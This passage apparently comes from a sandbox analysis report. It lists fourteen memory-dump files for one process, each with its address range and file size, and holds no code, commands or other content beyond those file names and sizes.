                                                          • memory/4740-353-0x00007FF887F80000-0x00007FF8880EF000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/4740-355-0x00007FF888340000-0x00007FF88836E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4740-354-0x00007FF888450000-0x00007FF888469000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4740-352-0x00007FF888470000-0x00007FF888493000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4740-351-0x00007FF88D120000-0x00007FF88D139000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4740-350-0x00007FF88D1E0000-0x00007FF88D20D000-memory.dmp

                                                            Filesize

                                                            180KB

                                                          • memory/4740-349-0x00007FF88D2E0000-0x00007FF88D2EF000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/4740-348-0x00007FF88D2F0000-0x00007FF88D313000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4740-347-0x00007FF88D2D0000-0x00007FF88D2DD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4740-346-0x00007FF878930000-0x00007FF878A4C000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/4740-345-0x00007FF887E10000-0x00007FF887E1D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4740-344-0x00007FF887D60000-0x00007FF887D74000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4740-343-0x00007FF878400000-0x00007FF878775000-memory.dmp

                                                            Filesize

                                                            3.5MB

                                                          • memory/4740-342-0x00007FF878C90000-0x00007FF878D48000-memory.dmp

                                                            Filesize

                                                            736KB